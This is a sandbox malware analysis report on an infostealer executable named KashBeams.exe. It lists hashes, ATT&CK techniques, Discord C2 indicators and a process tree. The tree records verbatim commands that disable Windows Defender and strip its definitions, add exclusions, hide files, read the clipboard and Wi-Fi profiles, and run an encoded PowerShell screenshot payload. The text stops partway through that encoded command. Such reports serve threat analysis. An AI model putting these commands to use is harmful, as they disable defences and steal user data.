10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-01-2025 01:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KashBeams.exe
Size

7.5MB
MD5

309098a7fec40953d398abfd44794952
SHA1

031947e64a71a5ff9c5589c6cddcb26742cfd7c6
SHA256

10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9
SHA512

2567ca1482ecf65eb7aab2e50274b87999fc8c5add37fcfc2a259df323a5761178b326dd240e1446a906eb7a8f739dbf0118d61ac72a9f85b78224736523b34f
SSDEEP

196608:7qLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jT:KL+9qz8LD7fEUbiIqQgpT

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3768	powershell.exe
2300	powershell.exe
4820	powershell.exe
4412	powershell.exe
2948	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	KashBeams.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4176	cmd.exe
1152	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1852	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe
3908	KashBeams.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2112	tasklist.exe
2716	tasklist.exe
2620	tasklist.exe
1364	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1952	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023cc5-21.dat	upx
behavioral1/memory/3908-25-0x00007FFB257C0000-0x00007FFB25E90000-memory.dmp	upx
behavioral1/files/0x0007000000023cb7-27.dat	upx
behavioral1/files/0x0007000000023cc3-29.dat	upx
behavioral1/memory/3908-30-0x00007FFB3A320000-0x00007FFB3A345000-memory.dmp	upx
behavioral1/memory/3908-48-0x00007FFB3CD10000-0x00007FFB3CD1F000-memory.dmp	upx
behavioral1/files/0x0007000000023cbf-47.dat	upx
behavioral1/files/0x0007000000023cbd-46.dat	upx
behavioral1/files/0x0007000000023cbc-45.dat	upx
behavioral1/files/0x0007000000023cbb-44.dat	upx
behavioral1/files/0x0007000000023cba-43.dat	upx
behavioral1/files/0x0007000000023cb9-42.dat	upx
behavioral1/files/0x0007000000023cb8-41.dat	upx
behavioral1/files/0x0007000000023cb6-40.dat	upx
behavioral1/files/0x0007000000023cca-39.dat	upx
behavioral1/files/0x0007000000023cc9-38.dat	upx
behavioral1/files/0x0007000000023cc8-37.dat	upx
behavioral1/files/0x0007000000023cc4-34.dat	upx
behavioral1/files/0x0007000000023cc2-33.dat	upx
behavioral1/memory/3908-54-0x00007FFB38FF0000-0x00007FFB3901D000-memory.dmp	upx
behavioral1/memory/3908-58-0x00007FFB25290000-0x00007FFB257B2000-memory.dmp	upx
behavioral1/memory/3908-57-0x00007FFB39FA0000-0x00007FFB39FB5000-memory.dmp	upx
behavioral1/memory/3908-60-0x00007FFB35510000-0x00007FFB35529000-memory.dmp	upx
behavioral1/memory/3908-64-0x00007FFB34280000-0x00007FFB343F7000-memory.dmp	upx
behavioral1/memory/3908-62-0x00007FFB34E60000-0x00007FFB34E84000-memory.dmp	upx
behavioral1/memory/3908-74-0x00007FFB3A320000-0x00007FFB3A345000-memory.dmp	upx
behavioral1/memory/3908-76-0x00007FFB35500000-0x00007FFB3550D000-memory.dmp	upx
behavioral1/memory/3908-73-0x00007FFB38FE0000-0x00007FFB38FED000-memory.dmp	upx
behavioral1/memory/3908-72-0x00007FFB2D7D0000-0x00007FFB2D89D000-memory.dmp	upx
behavioral1/memory/3908-71-0x00007FFB348C0000-0x00007FFB348F3000-memory.dmp	upx
behavioral1/memory/3908-70-0x00007FFB34C20000-0x00007FFB34C39000-memory.dmp	upx
behavioral1/memory/3908-69-0x00007FFB257C0000-0x00007FFB25E90000-memory.dmp	upx
behavioral1/memory/3908-80-0x00007FFB30BE0000-0x00007FFB30CFB000-memory.dmp	upx
behavioral1/memory/3908-179-0x00007FFB39FA0000-0x00007FFB39FB5000-memory.dmp	upx
behavioral1/memory/3908-180-0x00007FFB25290000-0x00007FFB257B2000-memory.dmp	upx
behavioral1/memory/3908-217-0x00007FFB35510000-0x00007FFB35529000-memory.dmp	upx
behavioral1/memory/3908-264-0x00007FFB34E60000-0x00007FFB34E84000-memory.dmp	upx
behavioral1/memory/3908-290-0x00007FFB34280000-0x00007FFB343F7000-memory.dmp	upx
behavioral1/memory/3908-293-0x00007FFB2D7D0000-0x00007FFB2D89D000-memory.dmp	upx
behavioral1/memory/3908-292-0x00007FFB348C0000-0x00007FFB348F3000-memory.dmp	upx
behavioral1/memory/3908-305-0x00007FFB3A320000-0x00007FFB3A345000-memory.dmp	upx
behavioral1/memory/3908-304-0x00007FFB257C0000-0x00007FFB25E90000-memory.dmp	upx
behavioral1/memory/3908-318-0x00007FFB30BE0000-0x00007FFB30CFB000-memory.dmp	upx
behavioral1/memory/3908-345-0x00007FFB38FE0000-0x00007FFB38FED000-memory.dmp	upx
behavioral1/memory/3908-352-0x00007FFB34E60000-0x00007FFB34E84000-memory.dmp	upx
behavioral1/memory/3908-351-0x00007FFB35510000-0x00007FFB35529000-memory.dmp	upx
behavioral1/memory/3908-350-0x00007FFB25290000-0x00007FFB257B2000-memory.dmp	upx
behavioral1/memory/3908-349-0x00007FFB39FA0000-0x00007FFB39FB5000-memory.dmp	upx
behavioral1/memory/3908-348-0x00007FFB38FF0000-0x00007FFB3901D000-memory.dmp	upx
behavioral1/memory/3908-347-0x00007FFB3CD10000-0x00007FFB3CD1F000-memory.dmp	upx
behavioral1/memory/3908-346-0x00007FFB3A320000-0x00007FFB3A345000-memory.dmp	upx
behavioral1/memory/3908-344-0x00007FFB30BE0000-0x00007FFB30CFB000-memory.dmp	upx
behavioral1/memory/3908-343-0x00007FFB35500000-0x00007FFB3550D000-memory.dmp	upx
behavioral1/memory/3908-342-0x00007FFB2D7D0000-0x00007FFB2D89D000-memory.dmp	upx
behavioral1/memory/3908-341-0x00007FFB348C0000-0x00007FFB348F3000-memory.dmp	upx
behavioral1/memory/3908-338-0x00007FFB34280000-0x00007FFB343F7000-memory.dmp	upx
behavioral1/memory/3908-330-0x00007FFB257C0000-0x00007FFB25E90000-memory.dmp	upx
behavioral1/memory/3908-339-0x00007FFB34C20000-0x00007FFB34C39000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1152	cmd.exe
2472	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4308	cmd.exe
4852	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3944	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4644	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133810342851631111"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2472	PING.EXE

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4412	powershell.exe
3768	powershell.exe
3768	powershell.exe
2948	powershell.exe
2948	powershell.exe
1152	powershell.exe
1152	powershell.exe
4412	powershell.exe
4412	powershell.exe
3768	powershell.exe
3768	powershell.exe
4884	powershell.exe
4884	powershell.exe
1152	powershell.exe
2948	powershell.exe
4884	powershell.exe
2300	powershell.exe
2300	powershell.exe
1988	powershell.exe
1988	powershell.exe
4820	powershell.exe
4820	powershell.exe
5064	powershell.exe
5064	powershell.exe
4548	chrome.exe
4548	chrome.exe
400	chrome.exe
400	chrome.exe
400	chrome.exe
400	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	tasklist.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	2716	tasklist.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	WMIC.exe
Token: SeSecurityPrivilege	4468	WMIC.exe
Token: SeTakeOwnershipPrivilege	4468	WMIC.exe
Token: SeLoadDriverPrivilege	4468	WMIC.exe
Token: SeSystemProfilePrivilege	4468	WMIC.exe
Token: SeSystemtimePrivilege	4468	WMIC.exe
Token: SeProfSingleProcessPrivilege	4468	WMIC.exe
Token: SeIncBasePriorityPrivilege	4468	WMIC.exe
Token: SeCreatePagefilePrivilege	4468	WMIC.exe
Token: SeBackupPrivilege	4468	WMIC.exe
Token: SeRestorePrivilege	4468	WMIC.exe
Token: SeShutdownPrivilege	4468	WMIC.exe
Token: SeDebugPrivilege	4468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4468	WMIC.exe
Token: SeRemoteShutdownPrivilege	4468	WMIC.exe
Token: SeUndockPrivilege	4468	WMIC.exe
Token: SeManageVolumePrivilege	4468	WMIC.exe
Token: 33	4468	WMIC.exe
Token: 34	4468	WMIC.exe
Token: 35	4468	WMIC.exe
Token: 36	4468	WMIC.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeDebugPrivilege	2620	tasklist.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeIncreaseQuotaPrivilege	4468	WMIC.exe
Token: SeSecurityPrivilege	4468	WMIC.exe
Token: SeTakeOwnershipPrivilege	4468	WMIC.exe
Token: SeLoadDriverPrivilege	4468	WMIC.exe
Token: SeSystemProfilePrivilege	4468	WMIC.exe
Token: SeSystemtimePrivilege	4468	WMIC.exe
Token: SeProfSingleProcessPrivilege	4468	WMIC.exe
Token: SeIncBasePriorityPrivilege	4468	WMIC.exe
Token: SeCreatePagefilePrivilege	4468	WMIC.exe
Token: SeBackupPrivilege	4468	WMIC.exe
Token: SeRestorePrivilege	4468	WMIC.exe
Token: SeShutdownPrivilege	4468	WMIC.exe
Token: SeDebugPrivilege	4468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4468	WMIC.exe
Token: SeRemoteShutdownPrivilege	4468	WMIC.exe
Token: SeUndockPrivilege	4468	WMIC.exe
Token: SeManageVolumePrivilege	4468	WMIC.exe
Token: 33	4468	WMIC.exe
Token: 34	4468	WMIC.exe
Token: 35	4468	WMIC.exe
Token: 36	4468	WMIC.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	1364	tasklist.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeIncreaseQuotaPrivilege	820	WMIC.exe
Token: SeSecurityPrivilege	820	WMIC.exe
Token: SeTakeOwnershipPrivilege	820	WMIC.exe
Token: SeLoadDriverPrivilege	820	WMIC.exe
Token: SeSystemProfilePrivilege	820	WMIC.exe
Token: SeSystemtimePrivilege	820	WMIC.exe
Token: SeProfSingleProcessPrivilege	820	WMIC.exe
Token: SeIncBasePriorityPrivilege	820	WMIC.exe
Token: SeCreatePagefilePrivilege	820	WMIC.exe
Token: SeBackupPrivilege	820	WMIC.exe
Token: SeRestorePrivilege	820	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe
4548	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1384 wrote to memory of 3908	1384	KashBeams.exe	83
PID 1384 wrote to memory of 3908	1384	KashBeams.exe	83
PID 3908 wrote to memory of 1656	3908	KashBeams.exe	85
PID 3908 wrote to memory of 1656	3908	KashBeams.exe	85
PID 3908 wrote to memory of 1592	3908	KashBeams.exe	86
PID 3908 wrote to memory of 1592	3908	KashBeams.exe	86
PID 3908 wrote to memory of 1952	3908	KashBeams.exe	87
PID 3908 wrote to memory of 1952	3908	KashBeams.exe	87
PID 3908 wrote to memory of 3900	3908	KashBeams.exe	91
PID 3908 wrote to memory of 3900	3908	KashBeams.exe	91
PID 3908 wrote to memory of 2216	3908	KashBeams.exe	93
PID 3908 wrote to memory of 2216	3908	KashBeams.exe	93
PID 3908 wrote to memory of 2228	3908	KashBeams.exe	94
PID 3908 wrote to memory of 2228	3908	KashBeams.exe	94
PID 1656 wrote to memory of 4412	1656	cmd.exe	97
PID 1656 wrote to memory of 4412	1656	cmd.exe	97
PID 2228 wrote to memory of 2112	2228	cmd.exe	98
PID 2228 wrote to memory of 2112	2228	cmd.exe	98
PID 3908 wrote to memory of 3696	3908	KashBeams.exe	150
PID 3908 wrote to memory of 3696	3908	KashBeams.exe	150
PID 1592 wrote to memory of 3768	1592	cmd.exe	99
PID 1592 wrote to memory of 3768	1592	cmd.exe	99
PID 1952 wrote to memory of 2044	1952	cmd.exe	131
PID 1952 wrote to memory of 2044	1952	cmd.exe	131
PID 2216 wrote to memory of 2716	2216	cmd.exe	103
PID 2216 wrote to memory of 2716	2216	cmd.exe	103
PID 3908 wrote to memory of 4176	3908	KashBeams.exe	104
PID 3908 wrote to memory of 4176	3908	KashBeams.exe	104
PID 3908 wrote to memory of 3160	3908	KashBeams.exe	107
PID 3908 wrote to memory of 3160	3908	KashBeams.exe	107
PID 3908 wrote to memory of 884	3908	KashBeams.exe	109
PID 3908 wrote to memory of 884	3908	KashBeams.exe	109
PID 3900 wrote to memory of 2948	3900	cmd.exe	105
PID 3900 wrote to memory of 2948	3900	cmd.exe	105
PID 3908 wrote to memory of 4960	3908	KashBeams.exe	112
PID 3908 wrote to memory of 4960	3908	KashBeams.exe	112
PID 3908 wrote to memory of 4308	3908	KashBeams.exe	110
PID 3908 wrote to memory of 4308	3908	KashBeams.exe	110
PID 3908 wrote to memory of 4548	3908	KashBeams.exe	116
PID 3908 wrote to memory of 4548	3908	KashBeams.exe	116
PID 3908 wrote to memory of 2444	3908	KashBeams.exe	113
PID 3908 wrote to memory of 2444	3908	KashBeams.exe	113
PID 3696 wrote to memory of 4468	3696	cmd.exe	120
PID 3696 wrote to memory of 4468	3696	cmd.exe	120
PID 4176 wrote to memory of 1152	4176	cmd.exe	121
PID 4176 wrote to memory of 1152	4176	cmd.exe	121
PID 3160 wrote to memory of 2620	3160	cmd.exe	122
PID 3160 wrote to memory of 2620	3160	cmd.exe	122
PID 4308 wrote to memory of 4852	4308	cmd.exe	123
PID 4308 wrote to memory of 4852	4308	cmd.exe	123
PID 884 wrote to memory of 4624	884	cmd.exe	124
PID 884 wrote to memory of 4624	884	cmd.exe	124
PID 4960 wrote to memory of 4644	4960	cmd.exe	125
PID 4960 wrote to memory of 4644	4960	cmd.exe	125
PID 2444 wrote to memory of 4744	2444	cmd.exe	126
PID 2444 wrote to memory of 4744	2444	cmd.exe	126
PID 4548 wrote to memory of 4884	4548	cmd.exe	127
PID 4548 wrote to memory of 4884	4548	cmd.exe	127
PID 3908 wrote to memory of 2880	3908	KashBeams.exe	154
PID 3908 wrote to memory of 2880	3908	KashBeams.exe	154
PID 3908 wrote to memory of 660	3908	KashBeams.exe	130
PID 3908 wrote to memory of 660	3908	KashBeams.exe	130
PID 2880 wrote to memory of 1052	2880	cmd.exe	132
PID 2880 wrote to memory of 1052	2880	cmd.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2044	attrib.exe
548	attrib.exe
1604	attrib.exe

C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
"C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
  "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1952
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
      4⤵
      Views/modifies file attributes
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3160
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA